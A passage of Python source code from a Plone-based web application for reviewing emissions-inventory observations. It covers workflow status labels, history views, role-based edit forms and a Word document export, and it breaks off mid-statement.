[\"Counterparts comments requested\", \"conclusionIcon\"]\n else:\n questions = self.get_values_cat('Question')\n if questions:\n question = questions[-1]\n state = question.get_state_api()\n if state in ['draft']:\n return [\"Question drafted\", \"questionIcon\"]\n elif state in ['counterpart-comments']:\n return [\"Counterpart's comments requested\", \"questionIcon\"]\n elif state in ['answered']:\n return ['Pending question', \"questionIcon\"]\n elif state in [\n 'pending',\n 'pending-answer-drafting',\n 'recalled-msa']:\n return ['Open question', \"questionIcon\"]\n elif state in ['drafted', 'recalled-lr']:\n return ['Draft question', \"questionIcon\"]\n elif state in ['expert-comments']:\n return ['MS expert comments requested', 'questionIcon']\n elif state in ['closed']:\n return ['Closed question', \"questionIcon\"]\n else:\n return ['Observation created', \"observationIcon\"]\n\n return ['Unknown', 'observationIcon']\n\n def observation_status(self):\n status = self.observation_question_status()\n my_status = self.get_status()\n\n if status in ['draft',\n 'counterpart-comments',\n 'observation-draft']:\n return 'SE'\n elif status in ['drafted', 'recalled-lr']:\n return 'LR'\n elif status in ['pending',\n 'recalled-msa',\n 'pending-answer-drafting',\n 'expert-comments']:\n return 'MSC'\n elif status in ['answered']:\n return 'answered'\n elif status in ['conclusions',\n 'conclusions-lr-denied',\n 'conclusion-discussion']:\n return 'conclusions'\n elif status in ['close-requested']:\n return 'close-requested'\n elif status == 'closed':\n conclusion = self.get_conclusion()\n conclusion_reason = conclusion and conclusion.closing_reason or ''\n if (conclusion_reason == 'no-conclusion-yet'):\n return \"SE\"\n elif not my_status.endswith('closed'):\n return \"answered\"\n else:\n return \"finalised\"\n else:\n return status\n\n def observation_questions_workflow(self):\n questions = self.get_values_cat('Question')\n if not questions:\n return tuple()\n\n # there is always only one question.\n question = questions[0]\n\n items = question.values()\n\n comments = [i for i in items if i.portal_type == 'Comment']\n # answers = [i for i in items if i.portal_type == 'CommentAnswer']\n\n len_comments = len(comments)\n obs_status = self.observation_status()\n\n return tuple(['Answered'] * (len_comments - 1) + [obs_status])\n\n def overview_status(self):\n status = self.get_status()\n closed_val = 'closed ({reason})'\n if status == 'closed':\n conclusion = self.get_conclusion()\n if conclusion:\n return closed_val.format(reason=conclusion.reason_value())\n else:\n return 'open'\n\n def is_secretariat(self):\n user = api.user.get_current()\n return 'Manager' in user.getRoles()\n\n @cache(_user_name)\n def _author_name(self, userid):\n if userid:\n user = api.user.get(username=userid)\n if user:\n return user.getProperty('fullname', userid)\n\n return userid\n\n def get_author_name(self, userid=None):\n if not userid:\n userid = self.Creator()\n\n return self._author_name(userid)\n\n def myHistory(self):\n observation_history = self.workflow_history.get(\n 'esd-review-workflow', [])\n observation_wf = []\n question_wf = []\n for item in observation_history:\n item['role'] = item['actor']\n item['object'] = 'observationIcon'\n item['author'] = self.get_author_name(item['actor'])\n i_rstate = item['review_state']\n i_action = item['action']\n if i_rstate == 'draft':\n item['state'] = 'Draft observation'\n item['role'] = \"Sector Expert\"\n observation_wf.append(item)\n elif (i_rstate == 'pending' and i_action == \"approve\"):\n item['state'] = 'Pending'\n # Do not add\n elif i_rstate == 'pending' and i_action == \"reopen\":\n item['state'] = 'Observation reopened'\n item['role'] = \"Sector Expert\"\n observation_wf.append(item)\n elif i_rstate == 'pending':\n item['state'] = 'Pending'\n # Do not add\n elif i_rstate == 'closed':\n item['state'] = 'Closed observation'\n item['role'] = \"Lead Reviewer\"\n observation_wf.append(item)\n elif i_rstate == 'close-requested':\n item['state'] = 'Finalisation requested'\n item['role'] = \"Sector Expert\"\n observation_wf.append(item)\n elif (i_rstate in ('conclusions', 'conclusions-lr-denied')\n and i_action == \"deny-finishing-observation\"):\n item['state'] = 'Finalisation denied'\n item['role'] = \"Lead reviewer\"\n observation_wf.append(item)\n elif (i_rstate == 'conclusions-lr-denied'\n and i_action == \"recall-lr\"):\n item['state'] = 'Recalled by LR'\n item['role'] = \"Lead reviewer\"\n observation_wf.append(item)\n elif i_rstate == 'closed' and i_action == \"recall-lr\":\n item['state'] = 'Recalled by LR'\n item['role'] = \"Lead reviewer\"\n observation_wf.append(item)\n elif i_rstate == 'conclusion-discussion':\n item['state'] = 'Conclusion comments requested'\n item['role'] = \"Sector Expert\"\n item['object'] = 'conclusionIcon'\n observation_wf.append(item)\n elif i_rstate == 'conclusions' and i_action == \"finish-comments\":\n item['state'] = 'Conclusion comments closed'\n item['role'] = \"Sector Expert\"\n item['object'] = 'conclusionIcon'\n observation_wf.append(item)\n elif i_rstate == 'conclusions' and i_action == \"draft-conclusions\":\n item['state'] = 'Conclusion drafting'\n item['role'] = \"Sector Expert\"\n item['object'] = 'conclusionIcon'\n observation_wf.append(item)\n else:\n item['state'] = '*' + i_rstate + '*'\n observation_wf.append(item)\n\n history = list(observation_wf)\n question = self.get_question()\n\n if question:\n question_history = question.workflow_history.get(\n 'esd-question-review-workflow', [])\n for item in question_history:\n item['role'] = item['actor']\n item['object'] = 'questionIcon'\n item['author'] = self.get_author_name(item['actor'])\n i_rstate = item['review_state']\n i_action = item['action']\n if i_rstate == 'draft' and i_action == \"reopen\":\n item['state'] = 'Draft question'\n item['role'] = \"Sector Expert\"\n question_wf.append(item)\n elif i_rstate == 'counterpart-comments':\n item['state'] = 'Requested counterparts comments'\n item['role'] = \"Sector Expert\"\n question_wf.append(item)\n elif i_rstate == 'draft' and i_action == 'send-comments':\n item['state'] = 'Counterparts comments closed'\n item['role'] = \"Sector Expert\"\n question_wf.append(item)\n elif i_rstate == 'drafted':\n item['state'] = 'Sent to LR'\n item['role'] = \"Sector Expert\"\n question_wf.append(item)\n elif i_rstate == 'draft' and i_action == 'recall-sre':\n item['state'] = 'Question recalled'\n item['role'] = \"Sector Expert\"\n question_wf.append(item)\n elif i_rstate == 'draft' and i_action == 'redraft':\n item['state'] = 'Question redrafted'\n item['role'] = \"Sector Expert\"\n question_wf.append(item)\n elif i_rstate == 'draft':\n # Do not add\n pass\n elif i_rstate == 'pending' and i_action == 'approve-question':\n item['state'] = (\n 'Question approved and '\n 'sent to MS coordinator')\n item['role'] = \"Lead reviewer\"\n question_wf.append(item)\n elif i_rstate == 'recalled-lr':\n item['state'] = 'Question recalled'\n item['role'] = \"Lead reviewer\"\n question_wf.append(item)\n elif i_rstate == 'answered':\n item['state'] = 'Answer sent'\n item['role'] = \"Member state coordinator\"\n question_wf.append(item)\n elif i_rstate == 'expert-comments':\n item['state'] = 'MS expert comments requested'\n item['role'] = \"Member state coordinator\"\n question_wf.append(item)\n elif i_rstate == 'pending-answer-drafting':\n item['state'] = 'Member state expert comments closed'\n item['role'] = \"Member state coordinator\"\n question_wf.append(item)\n elif i_rstate == 'recalled-msa':\n item['state'] = 'Answer recalled'\n item['role'] = \"Member state coordinator\"\n question_wf.append(item)\n elif (i_action == 'validate-answer-msa'\n and i_action == 'validate-answer-msa'):\n item['state'] = 'Answer acknowledged'\n item['role'] = \"Sector Expert\"\n question_wf.append(item)\n elif i_rstate == 'draft' and i_action == \"reopen\":\n item['state'] = 'Reopened'\n # Do not add\n elif i_rstate == 'closed':\n item['state'] = 'Closed'\n # Do not add\n else:\n item['state'] = '*' + i_rstate + '*'\n item['role'] = item['actor']\n question_wf.append(item)\n\n history = list(observation_wf) + list(question_wf)\n\n history.sort(key=lambda x: x[\"time\"], reverse=False)\n return history\n\n def can_edit(self):\n sm = getSecurityManager()\n return sm.checkPermission('Modify portal content', self)\n\n def get_question(self):\n questions = self.get_values_cat('Question')\n\n if questions:\n question = questions[-1]\n return question\n\n def observation_question_status(self):\n questions = self.get_values_cat('Question')\n if self.get_status() != 'pending':\n if self.get_status() in ['conclusions', 'conclusions-lr-denied']:\n if questions:\n question = questions[-1]\n question_state = api.content.get_state(question)\n if question_state != 'closed':\n return question_state\n return self.get_status()\n else:\n if questions:\n question = questions[-1]\n state = api.content.get_state(question)\n return state\n else:\n return \"observation-draft\"\n\n def observation_css_class(self):\n if self.highlight:\n if self.get_status() == \"closed\":\n con = self.get_conclusion()\n if con:\n if con.closing_reason == \"technical-correction\":\n return 'technicalCorrectionBackground'\n\n elif 'ptc' in self.highlight:\n return 'ptcBackground'\n\n def observation_is_potential_significant_issue(self):\n if self.highlight:\n return 'psi' in self.highlight\n return False\n\n def observation_is_potential_technical_correction(self):\n if self.highlight:\n return 'ptc' in self.highlight\n return False\n\n def observation_is_technical_correction(self):\n if self.highlight:\n return 'tc' in self.highlight\n return False\n\n def observation_is_revised_estimate(self):\n if self.highlight:\n return 'rev-est' in self.highlight\n return False\n\n def get_conclusion(self):\n conclusions = self.get_values_cat('Conclusions')\n mtool = api.portal.get_tool('portal_membership')\n if conclusions and mtool.checkPermission('View', conclusions[0]):\n return conclusions[0]\n return None\n\n def last_question_reply_number(self):\n questions = self.get_values_cat('Question')\n replynum = 0\n if questions:\n comments = [\n c for c in questions[-1].values()\n if c.portal_type == \"Comment\"\n ]\n if comments:\n last = comments[-1]\n disc = IConversation(last)\n return disc.total_comments\n\n return replynum\n\n def last_answer_reply_number(self):\n questions = self.get_values_cat('Question')\n replynum = 0\n if questions:\n comments = [\n c for c in questions[-1].values()\n if c.portal_type == \"CommentAnswer\"\n ]\n if comments:\n last = comments[-1]\n disc = IConversation(last)\n return disc.total_comments\n\n return replynum\n\n def reply_comments_by_mse(self):\n question = self.get_question()\n commentators = []\n if question:\n commentators = list(\n set(\n chain.from_iterable(\n [\n IConversation(c).commentators\n for c in question.values()\n ]\n )\n )\n )\n\n return [\n uid\n for uid in commentators\n if ROLE_MSE in api.user.get_roles(username=uid, obj=self)\n ]\n\n def observation_already_replied(self):\n\n questions = self.get_values_cat('Question')\n if questions:\n question = questions[0]\n winfo = question.workflow_history\n this_year = datetime.datetime.now().year\n # [refs #134160] only count events that happened this year\n # as the Observation may be a carry-over.\n states = [\n w.get('review_state')\n for w in winfo.get('esd-question-review-workflow', [])\n if w[\"time\"].year() == this_year\n ]\n if states:\n sp = { s: idx for idx, s in enumerate(states) }\n return (\n states[-1] not in [\n 'recalled-msa',\n 'pending',\n 'pending-answer-drafting',\n 'expert-comments',\n ]\n and sp.get('answered')\n )\n\n return False\n\n def can_add_followup(self):\n status = self.get_status()\n return status in ['conclusions', 'conclusions-lr-denied']\n\n\ndef set_form_widgets(form_instance):\n fields = form_instance.fields\n widgets = form_instance.widgets\n if 'IDublinCore.title' in fields.keys():\n fields['IDublinCore.title'].field.required = False\n widgets['IDublinCore.title'].mode = interfaces.HIDDEN_MODE\n widgets['IDublinCore.description'].mode = interfaces.HIDDEN_MODE\n\n w_activity_data = widgets['activity_data']\n if _is_projection(form_instance.context):\n for fname in ['nfr_code', 'nfr_code_inventory']:\n nfr_w = widgets.get(fname)\n\n # [refs #250017] Projections: Hiding the review subsectors options\n if fname == 'nfr_code_inventory':\n nfr_w.mode = interfaces.HIDDEN_MODE\n\n if nfr_w: # Some users don't get to edit the nfr_code.\n nfr_w.label = get_nfr_title_projection(fname)\n\n widgets['fuel'].mode = interfaces.HIDDEN_MODE\n widgets['activity_data_type'].template = Z3ViewPageTemplateFile(\n 'templates/widget_activity_type.pt'\n )\n w_activity_data.template = Z3ViewPageTemplateFile(\n 'templates/widget_activity.pt'\n )\n w_activity_data.activity_data_registry = json.dumps(\n get_registry_interface_field_data(\n INECDVocabularies,\n 'activity_data'\n )\n )\n # # [refs #104852] hide fields for PROJECTION_HIDE_YEARS users\n # if projection_hide_for_user():\n # widgets['year'].mode = interfaces.HIDDEN_MODE\n # widgets['reference_year'].mode = interfaces.HIDDEN_MODE\n else:\n w_activity_data.mode = interfaces.HIDDEN_MODE\n widgets['scenario'].mode = interfaces.HIDDEN_MODE\n widgets['activity_data_type'].mode = interfaces.HIDDEN_MODE\n widgets['pollutants'].template = Z3ViewPageTemplateFile(\n 'templates/widget_pollutants.pt'\n )\n widgets['nfr_code_inventory'].mode = interfaces.HIDDEN_MODE\n\n widgets['text'].rows = 15\n widgets['highlight'].template = Z3ViewPageTemplateFile(\n 'templates/widget_highlight.pt'\n )\n form_instance.groups = [\n g for g in form_instance.groups if\n g.label == 'label_schema_default'\n ]\n\n\ndef set_form_fields(form_instance):\n fields = form_instance.fields\n if _is_projection(form_instance.context):\n hide_for_user = projection_hide_for_user()\n if hide_for_user:\n del fields['year']\n del fields['reference_year']\n fields['parameter'].field = schema.List(\n title=u\"Parameter\",\n value_type=schema.Choice(\n vocabulary='emrt.necd.content.parameter',\n ),\n required=False,\n )\n fields['pollutants'].field = schema.List(\n title=u\"Pollutants\",\n value_type=schema.Choice(\n vocabulary='emrt.necd.content.pollutants',\n ),\n required=False,\n )\n else:\n fields['year'].field = schema.List(\n title=u'Projection year',\n description=(\n u\"Projection year is the year or a \"\n \"list of years \"\n u\"(e.g. '2050', '2025, 2030') when the emissions had\"\n u\" occured for which an issue was observed in the review.\"\n ),\n value_type=schema.Choice(\n values=[\n u'2025',\n u'2030',\n u'2040',\n u'2050',\n ]\n ),\n required=True,\n __name__='year', # otherwise there will be no value on edit\n )\n\n fields['year'].widgetFactory = CheckBoxFieldWidget\n else:\n del fields['reference_year']\n\n\nclass EditForm(edit.DefaultEditForm):\n def updateFields(self):\n super(EditForm, self).updateFields()\n set_form_fields(self)\n\n user = api.user.get_current()\n roles = api.user.get_roles(username=user.getId(), obj=self.context)\n fields = []\n if 'Manager' in roles:\n fields = field.Fields(IObservation)\n elif ROLE_SE in roles:\n fields = [f for f in field.Fields(IObservation) if f not in [\n 'country',\n 'nfr_code',\n 'review_year',\n 'technical_corrections',\n 'closing_comments',\n 'closing_deny_comments',\n\n ]]\n elif ROLE_LR in roles:\n fields = ['text', 'highlight']\n\n self.fields = self.fields.select(\n *set(fields).intersection(self.fields))\n\n self.groups = [g for g in self.groups if\n g.label == 'label_schema_default']\n\n checkbox_fields = [\n 'parameter', 'highlight', 'pollutants',\n 'activity_data', 'scenario_type'\n ]\n\n for cb in checkbox_fields:\n if cb in fields:\n self.fields[cb].widgetFactory = CheckBoxFieldWidget\n\n def updateWidgets(self):\n super(EditForm, self).updateWidgets()\n set_form_widgets(self)\n if _is_projection(self.context):\n saved_year = self.context.year\n if saved_year:\n for item in self.widgets['year'].items:\n if item['value'] in saved_year:\n item['checked'] = True\n\n def updateActions(self):\n super(EditForm, self).updateActions()\n for k in self.actions.keys():\n self.actions[k].addClass('standardButton')\n\n @button.buttonAndHandler(_(u'Save'), name='save')\n def handleApply(self, action):\n data, errors = self.extractData()\n if errors:\n self.status = self.formErrorsMessage\n return\n content = self.getContent()\n for key, value in data.items():\n if data[key] is interfaces.NOT_CHANGED:\n continue\n content._setPropValue(key, value)\n IStatusMessage(self.request).addStatusMessage(\n self.success_message, u\"info\"\n )\n self.request.response.redirect(self.nextURL())\n\n notify(ObjectModifiedEvent(content))\n\n @button.buttonAndHandler(_(u'Cancel'), name='cancel')\n def handleCancel(self, action):\n super(EditForm, self).handleCancel(self, action)\n\n\nclass AddForm(add.DefaultAddForm):\n label = 'Observation'\n description = ' '\n\n def updateFields(self):\n super(AddForm, self).updateFields()\n set_form_fields(self)\n\n def updateWidgets(self):\n super(AddForm, self).updateWidgets()\n set_form_widgets(self)\n\n def updateActions(self):\n super(AddForm, self).updateActions()\n self.actions['save'].title = u'Save Observation'\n self.actions['save'].addClass('defaultWFButton')\n self.actions['cancel'].title = u'Delete Observation'\n for k in self.actions.keys():\n self.actions[k].addClass('standardButton')\n\n def create(self, data):\n fti = getUtility(IDexterityFTI, name=self.portal_type)\n container = aq_inner(self.context)\n content = createObject(fti.factory)\n if hasattr(content, '_setPortalTypeName'):\n content._setPortalTypeName(fti.getId())\n\n # Acquisition wrap temporarily to satisfy things like vocabularies\n # depending on tools\n if IAcquirer.providedBy(content):\n content = content.__of__(container)\n id = str(int(time()))\n content.title = id\n content.id = id\n for key, value in data.items():\n content._setPropValue(key, value)\n notify(ObjectModifiedEvent(container))\n\n return aq_base(content)\n\n\nclass AddView(add.DefaultAddView):\n form = AddForm\n\n\nclass ObservationMixin(DefaultView):\n\n @property\n def user_roles(self):\n user = api.user.get_current()\n return api.user.get_roles(\n username=user.getId(), obj=self.context\n )\n\n def wf_info(self):\n context = aq_inner(self.context)\n wf = getToolByName(context, 'portal_workflow')\n comments = wf.getInfoFor(\n self.context, 'comments', wf_id='esd-review-workflow')\n actor = wf.getInfoFor(\n self.context, 'actor', wf_id='esd-review-workflow')\n tim = wf.getInfoFor(\n self.context, 'time', wf_id='esd-review-workflow')\n return {'comments': comments, 'actor': actor, 'time': tim}\n\n def isManager(self):\n sm = getSecurityManager()\n context = aq_inner(self.context)\n return sm.checkPermission('Manage portal', context)\n\n def get_menu_actions(self):\n context = aq_inner(self.context)\n menu_items = getMenu(\n 'plone_contentmenu_workflow',\n context,\n self.request\n )\n return [mitem for mitem in menu_items if not hidden(mitem)]\n\n def get_questions(self):\n return IContentListing(self.context.get_values_cat('Question'))\n\n def can_delete_observation(self):\n is_draft = self.context.get_status() in ['pending', 'draft']\n questions = len(self.context.get_values_cat('Question'))\n # If observation has conclusion cannot be deleted (Ticket #26992)\n conclusions = len(self.context.get_values_cat('Conclusions'))\n return is_draft and not questions and not conclusions\n\n def can_add_question(self):\n sm = getSecurityManager()\n questions = len(self.context.get_values_cat('Question'))\n p_add = 'emrt.necd.content: Add Question'\n return sm.checkPermission(p_add, self.context) and not questions\n\n def can_edit(self):\n sm = getSecurityManager()\n # If observation has conclusion cannot be edited (Ticket #26992)\n conclusions = len(self.context.get_values_cat('Conclusions'))\n p_edit = 'Modify portal content'\n return sm.checkPermission(p_edit, self.context) and not conclusions\n\n def get_conclusion(self):\n sm = getSecurityManager()\n conclusions = self.context.get_values_cat('Conclusions')\n if conclusions and sm.checkPermission('View', conclusions[0]):\n return conclusions[0]\n\n return None\n\n def existing_conclusion(self):\n conclusion = self.get_conclusion()\n return conclusion and True or False\n\n def can_add_conclusion(self):\n sm = getSecurityManager()\n question_state = api.content.get_state(self.question())\n\n return sm.checkPermission(\n 'emrt.necd.content: Add Conclusions', self.context\n ) and question_state in ['draft', 'drafted', 'pending', 'closed']\n\n def show_description(self):\n questions = self.get_questions()\n sm = getSecurityManager()\n if questions:\n question = questions[-1]\n return sm.checkPermission('View', question.getObject())\n else:\n return ms_user.hide_from_ms(self.context)\n\n def show_internal_notes(self):\n return ms_user.hide_from_ms(self.context)\n\n def can_view_redraft_reason(self):\n sm = getSecurityManager()\n return sm.checkPermission(P_OBS_REDRAFT_REASON_VIEW, self.context)\n\n def add_question_form(self):\n form_instance = AddQuestionForm(self.context, self.request)\n alsoProvides(form_instance, IWrappedForm)\n return form_instance()\n\n def has_local_notifications_settings(self):\n user = api.user.get_current()\n adapted = INotificationUnsubscriptions(self.context)\n data = adapted.get_user_data(user.getId())\n\n return data and True or False\n\n # Question view\n def question(self):\n questions = self.get_questions()\n if questions:\n return questions[0].getObject()\n\n def get_chat(self):\n sm = getSecurityManager()\n question = self.question()\n if question:\n values = [\n v for v in question.values()\n if sm.checkPermission('View', v)\n ]\n return values\n\n def is_old_qa(self, comment):\n return comment.modification_date.year() < datetime.datetime.now().year\n\n def actions(self):\n context = aq_inner(self.context)\n question = self.question()\n observation_menu_items = getMenu(\n 'plone_contentmenu_workflow',\n context,\n self.request\n )\n menu_items = observation_menu_items\n if question:\n question_menu_items = getMenu(\n 'plone_contentmenu_workflow',\n question,\n self.request\n )\n # remove add-followup-question action\n # if the permission check is False\n if not self.can_add_follow_up_question():\n question_menu_items = [\n item for item in question_menu_items\n if not item['action'].endswith('add-followup-question')\n ]\n\n menu_items = question_menu_items + observation_menu_items\n return [mitem for mitem in menu_items if not hidden(mitem)]\n\n def get_user_name(self, userid, question=None):\n # check users\n if question is not None:\n country = self.context.country_value()\n sector = self.context.ghg_source_sectors_value()\n if question.portal_type == 'Comment':\n return ' - '.join([country, sector])\n elif question.portal_type == 'CommentAnswer':\n return ' - '.join([country, 'Coordinator'])\n\n if userid:\n user = api.user.get(username=userid)\n return user.getProperty('fullname', userid)\n return ''\n\n def can_add_follow_up_question(self):\n return getUtility(IFollowUpPermission)(self.question())\n\n def can_add_answer(self):\n sm = getSecurityManager()\n question = self.question()\n if question:\n p_add = 'emrt.necd.content: Add CommentAnswer'\n permission = sm.checkPermission(p_add, question)\n questions = [\n q for q in question.values()\n if q.portal_type == 'Comment'\n ]\n answers = [\n q for q in question.values()\n if q.portal_type == 'CommentAnswer'\n ]\n return permission and len(questions) > len(answers)\n else:\n return False\n\n def add_answer_form(self):\n form_instance = AddAnswerForm(self.context, self.request)\n alsoProvides(form_instance, IWrappedForm)\n return form_instance()\n\n def add_comment_form(self):\n form_instance = AddCommentForm(self.context, self.request)\n alsoProvides(form_instance, IWrappedForm)\n return form_instance()\n\n def in_conclusions(self):\n state = self.context.get_status()\n return state in [\n 'conclusions',\n 'conclusions-lr-denied',\n 'conclusion-discussion',\n 'close-requested',\n 'closed',\n ]\n\n def get_last_editable_thing(self):\n CONCLUSIONS_PHASE_2 = [\n 'conclusions',\n 'conclusions-lr-denied',\n 'conclusion-discussion',\n 'close-requested',\n ]\n\n state = self.context.get_status()\n if state in CONCLUSIONS_PHASE_2:\n return self.context.get_conclusion()\n else:\n question = self.question()\n if question is not None:\n qs = question.get_questions()\n return qs[-1].getObject() if qs else None\n\n return None\n\n def update(self):\n context = self.get_last_editable_thing()\n if context is not None:\n if context.can_edit():\n try:\n hist_meta = self.repo_tool.getHistoryMetadata(context)\n except Exception:\n hist_meta = None\n if hist_meta:\n retrieve = hist_meta.retrieve\n getId = hist_meta.getVersionId\n history = self.history = []\n hist_meta_len = hist_meta.getLength(countPurged=False)\n # Count backwards from most recent to least recent\n for i in xrange(hist_meta_len - 1, -1, -1):\n version = (\n retrieve(i, countPurged=False)['metadata'].copy()\n )\n version['version_id'] = getId(i, countPurged=False)\n history.append(version)\n dt = getToolByName(self.context, \"portal_diff\")\n\n version1 = self.request.get(\"one\", None)\n version2 = self.request.get(\"two\", None)\n\n if version1 is None and version2 is None:\n self.history.sort(\n lambda x, y: cmp(\n x.get('version_id', ''),\n y.get('version_id')\n ),\n reverse=True\n )\n version1 = self.history[-1].get(\n 'version_id', 'current')\n if len(self.history) > 1:\n version2 = self.history[-2].get(\n 'version_id', 'current')\n else:\n version2 = 'current'\n elif version1 is None:\n version1 = 'current'\n elif version2 is None:\n version2 = 'current'\n\n self.request.set('one', version1)\n self.request.set('two', version2)\n changeset = dt.createChangeSet(\n self.getVersion(version2),\n self.getVersion(version1),\n id1=self.versionTitle(version2),\n id2=self.versionTitle(version1))\n self.changes = [\n change for change in changeset.getDiffs()\n if not change.same\n ]\n\n @property\n def repo_tool(self):\n return getToolByName(self.context, \"portal_repository\")\n\n def getVersion(self, version):\n context = self.get_last_editable_thing()\n if version == \"current\":\n return context\n else:\n return self.repo_tool.retrieve(context, int(version)).object\n\n def versionName(self, version):\n \"\"\"\n Copied from @@history_view\n Translate the version name. This is needed to allow translation\n when `version` is the string 'current'.\n \"\"\"\n return _CMFE(version)\n\n def versionTitle(self, version):\n version_name = self.versionName(version)\n\n return translate(\n _CMFE(\n u\"version ${version}\",\n mapping=dict(version=version_name)\n ),\n context=self.request\n )\n\n def isChatCurrent(self):\n status = api.content.get_state(self.context)\n if status in ['draft', 'pending']:\n return True\n else:\n return False\n\n\nclass ObservationView(ObservationMixin):\n def get_current_counterparters(self):\n \"\"\" Return list of current counterparters,\n if the user can see counterpart action\n \"\"\"\n actions = [action['action'] for action in self.actions()]\n if not any('counterpart_form' in action for action in actions):\n return []\n\n target = self.context\n local_roles = target.get_local_roles()\n users = [\n u[0] for u in local_roles if ROLE_CP in u[1]\n ]\n return [api.user.get(user) for user in users]\n\n def can_export_observation(self):\n sm = getSecurityManager()\n return sm.checkPermission(\n 'emrt.necd.content: Export an Observation', self.context\n )\n\n def is_projection(self):\n return _is_projection(self.context.aq_parent)\n\n def carryover_source(self):\n result = None\n if getattr(self.context, \"carryover_from\", None):\n carryover_source_path = getattr(self.context, \"carryover_source_path\", None)\n if carryover_source_path:\n try:\n portal = api.portal.get()\n result = portal.restrictedTraverse(carryover_source_path)\n except Exception:\n pass\n if not result:\n my_path = self.context.getPhysicalPath()\n my_year = int(re.match(RE_YEAR, my_path[-2]).group())\n catalog = api.portal.get_tool(\"portal_catalog\")\n found = catalog(\n portal_type=\"Observation\",\n id=self.context.getId(),\n sort_on=\"modified\",\n sort_order=\"descending\"\n )\n candidates = []\n for brain in found:\n their_path = brain.getPath().split(\"/\")\n if their_path != my_path:\n their_year = int(re.match(RE_YEAR, their_path[-2]).group())\n if my_year > their_year:\n candidates.append(brain)\n if candidates:\n result = candidates[0].getObject()\n\n return result\n\n def carryover_source_view(self):\n source = self.carryover_source()\n if source:\n return getMultiAdapter((source, self.request), name=\"view\")\n\n\nclass ExportAsDocView(ObservationMixin):\n\n def strip_special_chars(self, s):\n \"\"\" return s without special chars\n \"\"\"\n return re.sub(r'\\s+', ' ', s)\n\n def build_file(self):\n is_projection = _is_projection(self.context)\n document = Document()\n\n # Styles\n style = document.styles.add_style(\n 'Label Bold', WD_STYLE_TYPE.PARAGRAPH)\n style.font.bold = True\n style = document.styles.add_style(\n 'Table Cell', WD_STYLE_TYPE.PARAGRAPH)\n style.font.size = Pt(9)\n style = document.styles.add_style(\n 'Table Cell Bold', WD_STYLE_TYPE.PARAGRAPH)\n style.font.size = Pt(9)\n style.font.bold = True\n\n document.add_paragraph('Ref. Number')\n document.add_heading(self.context.getId(), 0)\n\n document.add_paragraph('')\n table = document.add_table(rows=1, cols=6)\n hdr_cells = table.rows[0].cells\n hdr_cells[0].text = 'Country'\n hdr_cells[0].paragraphs[0].style = \"Table Cell Bold\"\n hdr_cells[1].text = 'Sector'\n hdr_cells[1].paragraphs[0].style = \"Table Cell Bold\"\n hdr_cells[2].text = 'Pollutants'\n hdr_cells[2].paragraphs[0].style = \"Table Cell Bold\"\n hdr_cells[3].text = 'Reference year' if is_projection else 'Fuel'\n hdr_cells[3].paragraphs[0].style = \"Table Cell Bold\"\n hdr_cells[4].text = 'Projection year' if is_projection \\\n else 'Inventory year'\n hdr_cells[4].paragraphs[0].style = \"Table Cell Bold\"\n if is_projection:\n hdr_cells[5].text = \"Activity data type\"\n hdr_cells[5].paragraphs[0].style = \"Table Cell Bold\"\n\n row_cells = table.add_row().cells\n row_cells[0].text = self.context.country_value() or ''\n row_cells[0].paragraphs[0].style = \"Table Cell\"\n row_cells[1].text = self.context.ghg_source_sectors_value() or ''\n row_cells[1].paragraphs[0].style = \"Table Cell\"\n row_cells[2].text = self.context.pollutants_value() or ''\n row_cells[2].paragraphs[0].style = \"Table Cell\"\n row_cells[3].text = get_vocabulary_value(\n self.context,\n IObservation['fuel'].vocabularyName,\n self.context.fuel\n ) if not is_projection else str(self.context.reference_year)\n row_cells[3].paragraphs[0].style = \"Table Cell\"\n row_cells[4].text = self.context.year or ''\n row_cells[4].paragraphs[0].style = \"Table Cell\"\n if is_projection:\n row_cells[5].text = self.context.activity_data_type or ''\n row_cells[5].paragraphs[0].style = \"Table Cell\"\n document.add_paragraph('')\n\n document.add_heading('Observation details', level=2)\n\n document.add_paragraph('')\n table = document.add_table(rows=1, cols=4)\n hdr_cells = table.rows[0].cells\n hdr_cells[0].text = 'Review Year'\n hdr_cells[1].text = 'Parameter'\n hdr_cells[2].text = 'Key category'\n hdr_cells[3].text = 'Last update'\n hdr_cells[0].paragraphs[0].style = \"Table Cell Bold\"\n hdr_cells[1].paragraphs[0].style = \"Table Cell Bold\"\n hdr_cells[2].paragraphs[0].style = \"Table Cell Bold\"\n hdr_cells[3].paragraphs[0].style = \"Table Cell Bold\"\n\n row_cells = table.add_row().cells\n row_cells[0].text = \"%s\" % self.context.review_year or ''\n row_cells[1].text = self.context.parameter_value() or ''\n if self.context.ms_key_category:\n row_cells[2].text = \"MS Key category\"\n else:\n row_cells[2].text = \"\"\n row_cells[3].text = self.context.modified().strftime(\n '%d %b %Y, %H:%M CET'\n )\n row_cells[0].paragraphs[0].style = \"Table Cell\"\n row_cells[1].paragraphs[0].style = \"Table Cell\"\n row_cells[2].paragraphs[0].style = \"Table Cell\"\n row_cells[3].paragraphs[0].style = \"Table Cell\"\n document.add_paragraph('')\n\n document.add_paragraph('Description flags', style=\"Label Bold\")\n document.add_paragraph(self.context.highlight_value())\n document.add_paragraph(\n 'Short description by sector expert', style=\"Label Bold\")\n document.add_paragraph(self.context.text)\n if is_projection:\n document.add_paragraph('Scenario Type', style=\"Label Bold\")\n document.add_paragraph(self.context.scenario_type_value())\n if self.context.nfr_code_inventory:\n document.add_paragraph(\n 'NFR Inventories Category Code', style=\"Label Bold\"\n )\n document.add_paragraph(self.context.nfr_code_inventory)\n document.add_paragraph('Activity Data', style=\"Label Bold\")\n document.add_paragraph('\\n'.join(\n self.context.activity_data_value()\n ))\n\n if self.context.get_status() == 'close-requested':\n document.add_heading('Finish observation', level=2)\n document.add_heading('Observation Finish Requested', level=3)\n document.add_paragraph(\n 'SE comments on finish observation request:',\n style=\"Label Bold\"\n )\n\n conclusion_2 = self.get_conclusion()\n if conclusion_2:\n document.add_page_break()\n document.add_heading('Conclusions', level=2)\n\n document.add_paragraph(\n 'Final status of observation:', style=\"Label Bold\")\n document.add_paragraph(conclusion_2.reason_value())\n document.add_paragraph(\n 'Recommendation/internal note:', style=\"Label Bold\")\n document.add_paragraph(conclusion_2.text)\n\n chats = self.get_chat()\n if chats:\n document.add_heading('Q&A', level=2)\n for chat in chats:\n date = chat.effective_date\n sent_info = \"Sent on: %s\"\n if not date:\n date = chat.modified()\n sent_info = \"Updated on: %s\"\n\n if chat.portal_type.lower() == 'comment':\n document.add_paragraph(\n '> %s' % self.strip_special_chars(chat.text)\n )\n document.add_paragraph(\n \"From TERTs To Member State \\t\\t %s\" % (\n sent_info % date.strftime('%d %b %Y, %H:%M CET')\n 